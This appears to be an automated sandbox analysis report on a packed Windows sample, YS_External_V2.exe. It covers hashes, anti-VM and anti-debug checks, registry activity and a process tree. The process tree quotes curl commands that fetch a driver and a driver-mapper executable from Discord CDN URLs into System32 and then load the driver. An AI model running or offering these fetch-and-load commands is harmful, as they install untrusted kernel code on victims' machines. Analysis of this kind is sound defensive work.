Analysis
- max time kernel: 21s
- max time network: 36s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-03-2023 17:31
Behavioral task behavioral1
- Sample: YS_External_V2.exe
- Resource: win7-20230220-en
Behavioral task behavioral2
- Sample: YS_External_V2.exe
- Resource: win10v2004-20230220-en
General
- Target: YS_External_V2.exe
- Size: 23.7MB
- MD5: a55deccd022c6cf5a67bd3138a0a6d69
- SHA1: cef90145fa44b969af6ec76b7ac650e778e5c953
- SHA256: 914d9b43d9d945fe5c372487ffa692b6d1d68e64945a726b2c35699c31af661e
- SHA512: b797d8ab14c3acc232d243c5a7bd0958929d93c4ba96b4dd68f3167c5b8753c63a874b1a6f0cdcd7f43dcb250958e0572b23ceee6b6e36a1fb1a011fb2e5ada6
- SSDEEP: 393216:Mm9FpgMIfmAL0Fnch/d9WOBkUS9RBnuBRhfvSoWchi3x1Bn:D97gb0dcd9jkLT8BjYc2N
Malware Config
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | YS_External_V2.exe
- Downloads MZ/PE file
- Sets service image path in registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" | yamsmapper.exe
- Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | YS_External_V2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | YS_External_V2.exe
- Executes dropped EXE 1 IoCs
Processes:
pid | process
1976 | yamsmapper.exe
- Themida packer (YARA rule match on memory dumps) 7 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
behavioral2/memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp | themida
- Checks whether UAC is enabled 1 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | YS_External_V2.exe
- Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\System32\yamsud.sys | curl.exe
File created | C:\Windows\System32\yamsmapper.exe | curl.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
2676 | YS_External_V2.exe
- Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
1976 | yamsmapper.exe
- Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeLoadDriverPrivilege | 1976 | yamsmapper.exe
- Suspicious use of WriteProcessMemory 20 IoCs
Processes:
description | pid | process | target process
PID 2676 wrote to memory of 1292 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 1292 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 3572 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 3572 | 2676 | YS_External_V2.exe | cmd.exe
PID 3572 wrote to memory of 3652 | 3572 | cmd.exe | curl.exe
PID 3572 wrote to memory of 3652 | 3572 | cmd.exe | curl.exe
PID 2676 wrote to memory of 536 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 536 | 2676 | YS_External_V2.exe | cmd.exe
PID 536 wrote to memory of 180 | 536 | cmd.exe | curl.exe
PID 536 wrote to memory of 180 | 536 | cmd.exe | curl.exe
PID 2676 wrote to memory of 112 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 112 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 3944 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 3944 | 2676 | YS_External_V2.exe | cmd.exe
PID 3944 wrote to memory of 1976 | 3944 | cmd.exe | yamsmapper.exe
PID 3944 wrote to memory of 1976 | 3944 | cmd.exe | yamsmapper.exe
PID 2676 wrote to memory of 4248 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 4248 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 4932 | 2676 | YS_External_V2.exe | cmd.exe
PID 2676 wrote to memory of 4932 | 2676 | YS_External_V2.exe | cmd.exe
Processes (tree; indentation shows parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe
      Command line: curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
      - Drops file in System32 directory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe
      Command line: curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
      - Drops file in System32 directory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\yamsmapper.exe
      Command line: C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
      - Sets service image path in registry
      - Executes dropped EXE
      - Suspicious behavior: LoadsDriver
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c pause >nul 2>&1
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\System32\yamsmapper.exe
  Filesize: 153KB
  MD5: 666d7f4bb7cf64772755b9a184486525
  SHA1: a645d988ff67e72aac11cc9560dbf89a8320aef0
  SHA256: a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
  SHA512: 3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
- C:\Windows\System32\yamsud.sys
  Filesize: 12KB
  MD5: 141ecbccc4bfbf03b8768232d5c6a273
  SHA1: 0e0c0340b8bccfd6aa352e80739c882e4bbe5404
  SHA256: 2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122
  SHA512: aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7
- memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB
- memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp
  Filesize: 37.1MB